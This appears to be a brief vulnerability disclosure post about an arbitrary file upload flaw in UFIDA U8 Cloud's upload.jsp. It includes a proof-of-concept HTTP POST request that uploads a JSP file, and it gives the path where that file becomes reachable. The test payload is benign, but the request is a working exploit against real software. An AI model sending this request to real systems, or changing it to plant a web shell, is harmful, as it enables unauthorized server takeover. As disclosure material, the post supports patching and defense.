Ufida U8 Cloud Upload Jsp Any File Upload Vulnerability
Ufida U8 Cloud Upload Jsp Any File Upload Vulnerability
UFIDA U8 cloud upload.jsp Any file upload vulnerability
Vulnerability Description
There is a vulnerability to upload any file in UFIDA U8 cloud upload.jsp file, and the attacker can obtain server permissions through the vulnerability.
Vulnerability Impact
UFIDA U8 cloud
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
POST /linux/pages/upload.jsp HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
filename: Test.jsp
Accept-Encoding: gzip
<% out.println("Test");%>
1
/linux/xxx.jsp
This post is licensed under CC BY 4.0 by the author.